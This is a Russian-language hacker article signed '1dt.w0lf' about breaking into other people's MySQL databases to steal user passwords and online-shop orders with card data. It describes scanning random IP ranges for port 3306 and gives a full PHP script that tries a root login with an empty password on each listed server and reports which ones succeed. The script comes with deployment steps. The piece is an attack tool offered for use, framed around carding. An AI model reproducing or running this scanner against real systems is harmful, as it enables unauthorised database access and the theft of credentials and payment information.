Базы данных - как много в этой фразе для сердца... кардера/хакера слилось. =) Итак что есть БД? Базы данных
вещь весьма и весьма полезная. В базе могут быть все настройки форумов, движков и прочее... прочее...
прочее... но что самое интересное и полезное в базе могут находится пароли юзеров, логины и пароли к
всевозможным сервисам и главное если сервер является онлайн-шопом в базе можно найти заказы и
соответственно инфу о картоне =) Значит нам просто необходимо поиметь пару, тройку баз данных и всё будет
шоколадно =) Именно такие мысли посетили меня когда я однажды вечером утюжил сеть. Особенных дел у меня в тот момент не
было и я решил что было бы неплохо немного посканить серваки на открытый 3306 порт. Для тех кто в танке: на
3306 порту по дефолту висит демон MySQL. Запустил сканер портов, я пользуюсь SuperScan так он имхо наиболее
быстрый и удобный, ввёл диапазон от балды и жмахнул по кнопарю старт =) Сканер немного попыхтел и выдал
результат, теперь у меня было около 250 адресов на которых был открыт скульный порт. Осталось дело за
малым, как всем наверно известно в MySQL по дефолту идёт юзер root без пароля, значит мне осталось лишь
попробовать подключится к каждому из этих серверов и попробовать авторизоваться под рутом без пароля.
Перспектива в ручную подключаться к каждому серверу меня что-то не вдохновляла. Порыскав немного по инету в
надежде найти прогу которая автоматизировала-бы эти действия я жестоко обломался, найти такую прогу мне не
удалось. Значит придётся написать самому. Дабы вы не заморачивались с данным действием я и привожу в этой
статье сорсы данной софтины... точнее скрипта. Писал на пхп так как этот язык мне наиболее близок и
симпатичен, да и работа с скулём через пхп достаточно проста.
<?
set_time_limit(0);
# берём список серверов для сканирования из файла servers.dat
$servers=file("servers.dat");
# получаем кол-во записей в файле
$strings=count($servers);
for($i=0; $i<$strings; $i++){
$server=$servers[$i];
# функция коннекта к базе, передаем переменную $server
connect($server);
}
function connect($server)
# а вот и сама функция подключения
{
# коннект к базе (сервер,"логин","пароль")
$co=mysql_connect($server,"root","");
# если подключится не удалось
if(!($co))
{
echo "connect 2 server $server failed<br>";
}
# если подключились то выводим сообщение
else
{
echo "connect 2 server $server success<br>";
}
}
?>
Теперь обзываем этот скрипт sqlbrute.php и закидываем на сервак. После этого создаём файл servers.dat со
списком адресов для сканирования и также аплоадим на сервер. После всего этого в браузере набиваем:
www.ваш_сайт.ru/sqlbrute.php и получаем отчёт =)
Возможно некоторые станут говорить что мол только лохи оставляют пустые пароли на базу данных и мол таких
дебильных админов найти невозможно, но я основываясь на своём опыте могу вам сказать что таких админов
достаточно много и кто ищет тот всегда найдёт.
Ну вот и всё. Хорошего вам коннекта, пухлых баз данных и гигабайтов ценной инфы.
Удачи.
Автор: 1dt.w0lf
